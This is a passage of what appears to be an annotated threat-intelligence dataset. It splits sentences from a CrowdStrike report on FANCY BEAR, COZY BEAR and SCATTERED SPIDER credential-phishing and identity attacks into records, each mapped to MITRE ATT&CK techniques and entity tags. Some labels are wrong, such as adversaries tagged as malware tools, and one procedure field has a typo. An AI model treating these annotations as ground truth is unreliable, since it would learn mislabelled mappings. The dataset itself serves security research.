"doc_id": "51_crowdstrike_report", "page_number": 12, "sentence_id": 81, "context_before": "Access Broker Advertisements by Month Month JAN 150 FEB 89", "sentence_text": "MAR 352 APR 160 MAY 134 JUNE 211 JULY 172 AUG 392 SEPT 194 OCT 449 NOV 450 DEC 239 30 90 150 210 270 330 390 450 TOTAL = 2,992 Today’s sophisticated cyberattacks only take minutes to succeed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p12-s82-e4fea2", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 12, "sentence_id": 82, "context_before": "MAR 352 APR 160 MAY 134 JUNE 211 JULY 172 AUG 392 SEPT 194 OCT 449 NOV 450 DEC 239 30 90 150 210 270 330 390 450 TOTAL = 2,992 Today’s sophisticated cyberattacks only take minutes to succeed.", "sentence_text": "Adversaries use techniques such as interactive hands-on-keyboard attacks and legitimate tools to attempt to hide from detection.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "adversaries use interactive hands-on-keyboard attacks and legitimate tool to avoid detection", "entities": [ { "text": "Adversaries ", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "interactive hands-on-keyboard attacks", "start": 35, "end": 72, "label": "Action" }, { "text": "legitimate tools", "start": 77, "end": 93, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p12-s83-0ef666", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 12, "sentence_id": 83, "context_before": "Adversaries use techniques such as interactive hands-on-keyboard attacks and legitimate tools to attempt to hide from detection.", "sentence_text": "Organizations must prioritize protecting identities in 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p13-s84-1e861a", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 13, "sentence_id": 84, "context_before": "Organizations must prioritize protecting identities in 2024.", "sentence_text": "Themes\nIDENTITY-BASED AND\nSOCIAL ENGINEERING ATTACKS Adversaries spanning multiple motivations and regions continue to use phishing techniques spoofing legitimate users to target valid accounts, as well as other authentication and identifying data, to conduct their attacks.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1087", "name": "Account Discovery" }, { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "social engineering attacks", "entities": [ { "text": "SOCIAL ENGINEERING ATTACKS", "start": 26, "end": 52, "label": "Action" }, { "text": "Adversaries ", "start": 53, "end": 65, "label": "MalwareTool" }, { "text": " phishing techniques", "start": 122, "end": 142, "label": "Action" }, { "text": "valid accounts", "start": 179, "end": 193, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p14-s85-8a6aba", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 14, "sentence_id": 85, "context_before": "Themes\nIDENTITY-BASED AND\nSOCIAL ENGINEERING ATTACKS Adversaries spanning multiple motivations and regions continue to use phishing techniques spoofing legitimate users to target valid accounts, as well as other authentication and identifying data, to conduct their attacks.", "sentence_text": "ACCOUNT CREDENTIALS\nAdversaries can authenticate to a system and/or user account using stolen credentials, which can either be obtained by the adversary directly (for example, using information stealers or exploiting unmanaged edge devices) or by purchasing them.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1087", "name": "Account Discovery" }, { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "adversaries authenticate to systems using stolen credentials", "entities": [ { "text": "Adversaries ", "start": 20, "end": 32, "label": "MalwareTool" }, { "text": "authenticate to a system and/or user account", "start": 36, "end": 80, "label": "Action" }, { "text": "stolen credentials", "start": 87, "end": 105, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p14-s86-11f7c9", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 14, "sentence_id": 86, "context_before": "ACCOUNT CREDENTIALS\nAdversaries can authenticate to a system and/or user account using stolen credentials, which can either be obtained by the adversary directly (for example, using information stealers or exploiting unmanaged edge devices) or by purchasing them.", "sentence_text": "API KEYS AND SECRETS Access to protected resources using stolen API keys and secrets may allow an adversary to steal sensitive data.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1552", "name": "Unsecured Credentials" } ], "procedure": "adversaries steal data", "entities": [ { "text": "steal sensitive data", "start": 111, "end": 131, "label": "MalwareTool" }, { "text": "adversary ", "start": 98, "end": 108, "label": "MalwareTool" }, { "text": "API KEYS AND SECRETS Access", "start": 0, "end": 27, "label": "Action" }, { "text": "stolen API keys and secrets", "start": 57, "end": 84, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p14-s87-3a89c1", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 14, "sentence_id": 87, "context_before": "API KEYS AND SECRETS Access to protected resources using stolen API keys and secrets may allow an adversary to steal sensitive data.", "sentence_text": "Unless the API keys and secrets are changed, the adversary could maintain indefinite access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p14-s88-51ca8d", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 14, "sentence_id": 88, "context_before": "Unless the API keys and secrets are changed, the adversary could maintain indefinite access.", "sentence_text": "SESSION COOKIES AND TOKENS Adversaries can steal session cookies and tokens to masquerade as the legitimate user and authenticate to an application.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1550.004", "name": "Web Session Cookie" }, { "id": "T1550.001", "name": "Application Access Token" }, { "id": "T1036.010", "name": "Masquerade Account Name" } ], "procedure": "adversaries steal sessions cookies and tokens to masquerade as valid accounts", "entities": [ { "text": "Adversaries ", "start": 27, "end": 39, "label": "MalwareTool" }, { "text": "steal session cookies and tokens", "start": 43, "end": 75, "label": "Action" }, { "text": " masquerade as the legitimate user", "start": 78, "end": 112, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p15-s89-cc19ee", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 15, "sentence_id": 89, "context_before": "SESSION COOKIES AND TOKENS Adversaries can steal session cookies and tokens to masquerade as the legitimate user and authenticate to an application.", "sentence_text": "BEAR Adversaries\nConduct Credential\nCollection Campaigns\nFANCY BEAR conducted regular credential collection campaigns throughout 2023.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1552", "name": "Unsecured Credentials" } ], "procedure": "FANCY BEAR collected credentials", "entities": [ { "text": "FANCY BEAR", "start": 57, "end": 67, "label": "MalwareTool" }, { "text": "BEAR Adversaries", "start": 0, "end": 16, "label": "MalwareTool" }, { "text": "conducted ", "start": 68, "end": 78, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p15-s90-ebcf4d", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 15, "sentence_id": 90, "context_before": "BEAR Adversaries\nConduct Credential\nCollection Campaigns\nFANCY BEAR conducted regular credential collection campaigns throughout 2023.", "sentence_text": "In March 2023, Microsoft patched a zero-day elevation-of-privilege vulnerability in Microsoft Outlook (CVE-2023-23397), which FANCY BEAR had been exploiting since at least March 2022 to solicit NT LAN Manager authentication sessions from targets using specially crafted spear-phishing emails.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1187", "name": "Forced Authentication" } ], "procedure": "FANCY BEAR exploits to solicit NTLM authenticating sessions", "entities": [ { "text": "FANCY BEAR", "start": 126, "end": 136, "label": "ThreatActor" }, { "text": "exploiting ", "start": 146, "end": 157, "label": "Action" }, { "text": "solicit NT LAN Manager authentication sessions", "start": 186, "end": 232, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p15-s91-6a6dbd", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 15, "sentence_id": 91, "context_before": "In March 2023, Microsoft patched a zero-day elevation-of-privilege vulnerability in Microsoft Outlook (CVE-2023-23397), which FANCY BEAR had been exploiting since at least March 2022 to solicit NT LAN Manager authentication sessions from targets using specially crafted spear-phishing emails.", "sentence_text": "The Polish Cyber Command reported that the adversary used this authentication data to connect to Exchange servers and change additional high-value account mailbox permissions through the Exchange Web Services protocol.1 FANCY BEAR also conducted credential phishing campaigns and developed a custom toolkit to capture credentials from Yahoo!", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" }, { "id": "T1566", "name": "Phishing" }, { "id": "T1098", "name": "Account Manipulation" }, { "id": "T1555.003", "name": "Credentials from Web Browsers" } ], "procedure": "adversary exchanged servers and change mailbox permissions", "entities": [ { "text": "adversary ", "start": 43, "end": 53, "label": "MalwareTool" }, { "text": "used ", "start": 53, "end": 58, "label": "Action" }, { "text": "Exchange servers", "start": 97, "end": 113, "label": "Action" }, { "text": "change additional high-value account mailbox permissions", "start": 118, "end": 174, "label": "Action" }, { "text": "FANCY BEAR", "start": 220, "end": 230, "label": "ThreatActor" }, { "text": "credential phishing campaigns", "start": 246, "end": 275, "label": "Action" }, { "text": "developed a custom toolkit to capture credentials", "start": 280, "end": 329, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p15-s92-00ab37", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 15, "sentence_id": 92, "context_before": "The Polish Cyber Command reported that the adversary used this authentication data to connect to Exchange servers and change additional high-value account mailbox permissions through the Exchange Web Services protocol.1 FANCY BEAR also conducted credential phishing campaigns and developed a custom toolkit to capture credentials from Yahoo!", "sentence_text": "Mail and ukr.net webmail users.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p15-s93-62161e", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 15, "sentence_id": 93, "context_before": "Mail and ukr.net webmail users.", "sentence_text": "The adversary expanded this toolkit to use the Browser-in-the-Browser technique in April 2023 and added MFA interception capabilities to its toolkit to collect OTPs sent to the MFA contact (e.g., a phone number) linked to the targeted account.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1621", "name": "Multi-Factor Authentication Request Generation" }, { "id": "T1556.006", "name": "Multi-Factor Authentication" } ], "procedure": "adversary added MFA interception to its toolkit", "entities": [ { "text": "adversary ", "start": 4, "end": 14, "label": "MalwareTool" }, { "text": "MFA interception capabilities", "start": 104, "end": 133, "label": "Action" }, { "text": "the MFA contact (e.g., a phone number) linked to the targeted account.", "start": 173, "end": 243, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p15-s94-34e291", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 15, "sentence_id": 94, "context_before": "The adversary expanded this toolkit to use the Browser-in-the-Browser technique in April 2023 and added MFA interception capabilities to its toolkit to collect OTPs sent to the MFA contact (e.g., a phone number) linked to the targeted account.", "sentence_text": "COZY BEAR has conducted credential phishing campaigns using Microsoft Teams messages to solicit MFA tokens for Microsoft 365 accounts since at least late May 2023.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1550.001", "name": "Application Access Token" } ], "procedure": "COZY BEAR did credential campaigns to solicit MFA tokens", "entities": [ { "text": "COZY BEAR", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": "credential phishing ", "start": 24, "end": 44, "label": "Action" }, { "text": "solicit MFA tokens", "start": 88, "end": 106, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p15-s95-44e2ba", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 15, "sentence_id": 95, "context_before": "COZY BEAR has conducted credential phishing campaigns using Microsoft Teams messages to solicit MFA tokens for Microsoft 365 accounts since at least late May 2023.", "sentence_text": "If a user accepts its initial message request, COZY BEAR attempts to socially engineer the target by claiming a change was made to their current MFA settings and stating an MFA code is required for verification.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1621", "name": "Multi-Factor Authentication Request Generation" }, { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "COZY BEAR socially engineer victim and trick them into giving them to provide their MFA", "entities": [ { "text": "user accepts its initial message request", "start": 5, "end": 45, "label": "Action" }, { "text": "COZY BEAR", "start": 47, "end": 56, "label": "ThreatActor" }, { "text": "socially engineer", "start": 69, "end": 86, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p15-s96-72359f", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 15, "sentence_id": 96, "context_before": "If a user accepts its initial message request, COZY BEAR attempts to socially engineer the target by claiming a change was made to their current MFA settings and stating an MFA code is required for verification.", "sentence_text": "account using Microsoft Entra ID (previously Azure Active Directory) before registering a new device and enabling a passwordless phone sign-in for the user.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p15-s97-87e6c3", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 15, "sentence_id": 97, "context_before": "account using Microsoft Entra ID (previously Azure Active Directory) before registering a new device and enabling a passwordless phone sign-in for the user.", "sentence_text": "The adversary also exported certificates containing private keys and requested a KRBTGT-authentication ticket for a different account using a legitimately issued certificate.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1552.004", "name": "Private Keys" }, { "id": "T1558.001", "name": "Golden Ticket" } ], "procedure": "adversary exported certificates containing private keys and requested authentication ticket", "entities": [ { "text": "adversary ", "start": 4, "end": 14, "label": "MalwareTool" }, { "text": "exported", "start": 19, "end": 27, "label": "Action" }, { "text": "private keys", "start": 52, "end": 64, "label": "Infrastructure_Indicator" }, { "text": "requested ", "start": 69, "end": 79, "label": "Action" }, { "text": "KRBTGT-authentication ticket", "start": 81, "end": 109, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p15-s98-56b6d3", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 15, "sentence_id": 98, "context_before": "The adversary also exported certificates containing private keys and requested a KRBTGT-authentication ticket for a different account using a legitimately issued certificate.", "sentence_text": "1 https://www.wojsko-polskie.pl/woc/articles/aktualnosci-w/detecting-malicious-activity-against-", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p16-s99-3a41de", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 16, "sentence_id": 99, "context_before": "1 https://www.wojsko-polskie.pl/woc/articles/aktualnosci-w/detecting-malicious-activity-against-", "sentence_text": "SCATTERED SPIDER\nConducts Sophisticated\nSocial Engineering Campaigns Identity-based techniques are also central to SCATTERED SPIDER tradecraft.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "SCATTER SPIDER did social engineering campaigns", "entities": [ { "text": "Social Engineering Campaigns", "start": 40, "end": 68, "label": "MalwareTool" }, { "text": "SCATTERED SPIDER", "start": 115, "end": 131, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p16-s100-b3c84b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 16, "sentence_id": 100, "context_before": "SCATTERED SPIDER\nConducts Sophisticated\nSocial Engineering Campaigns Identity-based techniques are also central to SCATTERED SPIDER tradecraft.", "sentence_text": "Throughout 2023, this adversary conducted sophisticated social engineering campaigns to access victim accounts.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "ADVERSARY cunduct4ed social engineering attacks", "entities": [ { "text": "adversary ", "start": 22, "end": 32, "label": "MalwareTool" }, { "text": " social engineering campaigns", "start": 55, "end": 84, "label": "Action" }, { "text": "victim accounts", "start": 95, "end": 110, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p16-s101-b32a03", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 16, "sentence_id": 101, "context_before": "Throughout 2023, this adversary conducted sophisticated social engineering campaigns to access victim accounts.", "sentence_text": "SCATTERED SPIDER’s tactics included SMS phishing (smishing) and voice phishing (vishing) to harvest credentials and phone calls made to victim organization help desks to persuade support personnel to provide password and/or MFA resets for targeted accounts.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1598", "name": "Phishing for Information" }, { "id": "T1566", "name": "Phishing" } ], "procedure": "SCATTERED SPIDER did phishing to harvest credentials", "entities": [ { "text": "SCATTERED SPIDER", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "SMS phishing", "start": 36, "end": 48, "label": "Action" }, { "text": "voice phishing", "start": 64, "end": 78, "label": "Action" }, { "text": "harvest credentials", "start": 92, "end": 111, "label": "Action" }, { "text": "victim organization", "start": 136, "end": 155, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p16-s102-aed624", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 16, "sentence_id": 102, "context_before": "SCATTERED SPIDER’s tactics included SMS phishing (smishing) and voice phishing (vishing) to harvest credentials and phone calls made to victim organization help desks to persuade support personnel to provide password and/or MFA resets for targeted accounts.", "sentence_text": "SCATTERED SPIDER deliberately selects social engineering campaign targets from employees in information security and other IT-related teams.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "select social engineering campaign targets from employees in IT and security teams", "entities": [ { "text": "SCATTERED SPIDER", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "selects social engineering campaign targets", "start": 30, "end": 73, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p16-s103-b60149", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 16, "sentence_id": 103, "context_before": "SCATTERED SPIDER deliberately selects social engineering campaign targets from employees in information security and other IT-related teams.", "sentence_text": "This is likely due to direct employee access to security tools as well as applications and documentation that may support lateral movement and further account compromise.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p16-s104-184032", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 16, "sentence_id": 104, "context_before": "This is likely due to direct employee access to security tools as well as applications and documentation that may support lateral movement and further account compromise.", "sentence_text": "In a minority of incidents, SCATTERED SPIDER targeted accounts belonging to employees who had direct access to company financial resources.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "target accounts of employees with access to financial resources", "entities": [ { "text": "SCATTERED SPIDER", "start": 28, "end": 44, "label": "ThreatActor" }, { "text": "targeted accounts belonging to employees", "start": 45, "end": 85, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p16-s105-3c7c47", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 16, "sentence_id": 105, "context_before": "In a minority of incidents, SCATTERED SPIDER targeted accounts belonging to employees who had direct access to company financial resources.", "sentence_text": "Additionally, SCATTERED SPIDER often configured residential proxies to appear as though they were logging in to victim accounts from the same geographical area as the legitimate account owner.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1090.002", "name": "External Proxy" } ], "procedure": "SCATTERED SPIDER used proxies to appear from legitimate areas", "entities": [ { "text": "SCATTERED SPIDER", "start": 14, "end": 30, "label": "ThreatActor" }, { "text": "configured residential proxies to appear as though they were logging in to victim accounts from the same geographical area", "start": 37, "end": 159, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p16-s106-6798f2", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 16, "sentence_id": 106, "context_before": "Additionally, SCATTERED SPIDER often configured residential proxies to appear as though they were logging in to victim accounts from the same geographical area as the legitimate account owner.", "sentence_text": "In doing so, the adversary further exhibited its understanding of identity-related security policies in enterprise organizations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p17-s107-782d15", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 17, "sentence_id": 107, "context_before": "In doing so, the adversary further exhibited its understanding of identity-related security policies in enterprise organizations.", "sentence_text": "FROM 2022 TO 2023 (FIGURE 2), WITH CLOUD-CONSCIOUS CASES Cloud-conscious is a term referring to threat actors who are aware of the ability to INCREASING BY 110% AND CLOUD- compromise cloud workloads and use this knowledge to abuse features unique to the AGNOSTIC CASES INCREASING cloud for their own purposes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p17-s109-08c85c", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 17, "sentence_id": 109, "context_before": "BY 60%.", "sentence_text": "eCrime adversaries are especially active in targeting cloud environments:\n84% of cloud-conscious intrusions attributed to adversaries were conducted by likely eCrime actors, compared to 16% conducted by targeted intrusion actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p17-s110-732d21", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 17, "sentence_id": 110, "context_before": "eCrime adversaries are especially active in targeting cloud environments:\n84% of cloud-conscious intrusions attributed to adversaries were conducted by likely eCrime actors, compared to 16% conducted by targeted intrusion actors.", "sentence_text": "INCIDENTS IN THE CLOUD CLOUD-CONSCIOUS CLOUD-AGNOSTIC 75% IN CLOUD INTRUSIONS 2021 2022 2023 ACTORS ARE AWARE THEY GAINED ACCESS TO A VICTIM-OWNED 110% CLOUD-CONSCIOUSCASES CLOUDVICTIM-OWNEDENVIRONMENTCLOUDANDSERVICEUSE THEIR ACCESS TO ABUSE THE ACTORS EITHER WERE NOT AWARE THEY HAD COMPROMISED A 60% CLOUD-AGNOSTICCASES CLOUDFEATURESENVIRONMENT OR DID NOT TAKE ADVANTAGE OF CLOUD SCATTERED SPIDER predominantly drove cloud-conscious activity increases throughout 2023, accounting for 29% of total cases.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p17-s111-8887db", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 17, "sentence_id": 111, "context_before": "INCIDENTS IN THE CLOUD CLOUD-CONSCIOUS CLOUD-AGNOSTIC 75% IN CLOUD INTRUSIONS 2021 2022 2023 ACTORS ARE AWARE THEY GAINED ACCESS TO A VICTIM-OWNED 110% CLOUD-CONSCIOUSCASES CLOUDVICTIM-OWNEDENVIRONMENTCLOUDANDSERVICEUSE THEIR ACCESS TO ABUSE THE ACTORS EITHER WERE NOT AWARE THEY HAD COMPROMISED A 60% CLOUD-AGNOSTICCASES CLOUDFEATURESENVIRONMENT OR DID NOT TAKE ADVANTAGE OF CLOUD SCATTERED SPIDER predominantly drove cloud-conscious activity increases throughout 2023, accounting for 29% of total cases.", "sentence_text": "Throughout 2023, SCATTERED SPIDER demonstrated progressive and sophisticated tradecraft within targeted cloud environments to maintain persistence, obtain credentials, move laterally and exfiltrate data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p17-s112-950dff", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 17, "sentence_id": 112, "context_before": "Throughout 2023, SCATTERED SPIDER demonstrated progressive and sophisticated tradecraft within targeted cloud environments to maintain persistence, obtain credentials, move laterally and exfiltrate data.", "sentence_text": "Adversaries’ preference for identity-based techniques is evident in their cloud-focused attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p17-s113-11d7c9", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 17, "sentence_id": 113, "context_before": "Adversaries’ preference for identity-based techniques is evident in their cloud-focused attacks.", "sentence_text": "Next are several observations of cloud- and identity-focused activities categorized by the MITRE ATT&CK® enterprise tactics of Initial Access, Persistence, Privilege Escalation, Credential Access, Lateral Movement, Exfiltration and Impact.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p18-s114-d48f6c", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 18, "sentence_id": 114, "context_before": "Next are several observations of cloud- and identity-focused activities categorized by the MITRE ATT&CK® enterprise tactics of Initial Access, Persistence, Privilege Escalation, Credential Access, Lateral Movement, Exfiltration and Impact.", "sentence_text": "Initial Access\nAdversaries relied on valid credentials to achieve initial access.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Adversaries relied on valid credentials", "entities": [ { "text": "Adversaries ", "start": 15, "end": 27, "label": "MalwareTool" }, { "text": "valid credentials", "start": 37, "end": 54, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p18-s115-c64782", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 18, "sentence_id": 115, "context_before": "Initial Access\nAdversaries relied on valid credentials to achieve initial access.", "sentence_text": "They obtained these credentials via accidental credential leakage, brute-force attacks, phishing/social engineering, credential stealers, access brokers, insecure self-service password-reset services and insider threats.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1110", "name": "Brute Force" }, { "id": "T1566", "name": "Phishing" }, { "id": "T1555", "name": "Credentials from Password Stores" } ], "procedure": "credentials were obtained through credentials leakage, brute force attacks, phishing, access brokers, insecure services , and insider threats", "entities": [ { "text": " accidental credential leakage", "start": 35, "end": 65, "label": "Action" }, { "text": "brute-force attacks", "start": 67, "end": 86, "label": "Action" }, { "text": " phishing/social engineering", "start": 87, "end": 115, "label": "Action" }, { "text": "credential stealers", "start": 117, "end": 136, "label": "Action" }, { "text": "access brokers", "start": 138, "end": 152, "label": "ThreatActor" }, { "text": "insecure self-service password-reset services", "start": 154, "end": 199, "label": "Infrastructure_Indicator" }, { "text": "insider threats.", "start": 204, "end": 220, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p18-s116-e10b6d", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 18, "sentence_id": 116, "context_before": "They obtained these credentials via accidental credential leakage, brute-force attacks, phishing/social engineering, credential stealers, access brokers, insecure self-service password-reset services and insider threats.", "sentence_text": "IN THE WILD FANCY BEAR AND SCATTERED SPIDER COMMONLY TARGETED MICROSOFT 365 CREDENTIALS VIA CREDENTIAL-PHISHING ATTACKS.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "FANCY BEAR and SCATTERED SPIDER used credential phishing attacks", "entities": [ { "text": " FANCY BEAR", "start": 11, "end": 22, "label": "ThreatActor" }, { "text": "SCATTERED SPIDER", "start": 27, "end": 43, "label": "ThreatActor" }, { "text": "CREDENTIAL-PHISHING ATTACKS.", "start": 92, "end": 120, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p18-s117-21714d", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 18, "sentence_id": 117, "context_before": "IN THE WILD FANCY BEAR AND SCATTERED SPIDER COMMONLY TARGETED MICROSOFT 365 CREDENTIALS VIA CREDENTIAL-PHISHING ATTACKS.", "sentence_text": "Persistence\nTo maintain access to Azure and Microsoft 365, adversaries commonly achieved persistence at the identity level.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p18-s118-75924d", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 18, "sentence_id": 118, "context_before": "Persistence\nTo maintain access to Azure and Microsoft 365, adversaries commonly achieved persistence at the identity level.", "sentence_text": "IN THE WILD ACHIEVING PERSISTENCE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p18-s119-084d27", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 18, "sentence_id": 119, "context_before": "IN THE WILD ACHIEVING PERSISTENCE", "sentence_text": "AT THE IDENTITY LEVEL IS COMMONLY ACHIEVED BY REGISTERING ADDITIONAL AUTHENTICATION FACTORS IN ENTRA ID.\nSCATTERED SPIDER USED AN IDENTITY PROVIDER TO ESTABLISH PERSISTENCE WITH A FEDERATED DOMAIN IN ENTRA ID, INITIALLY RELYING ON 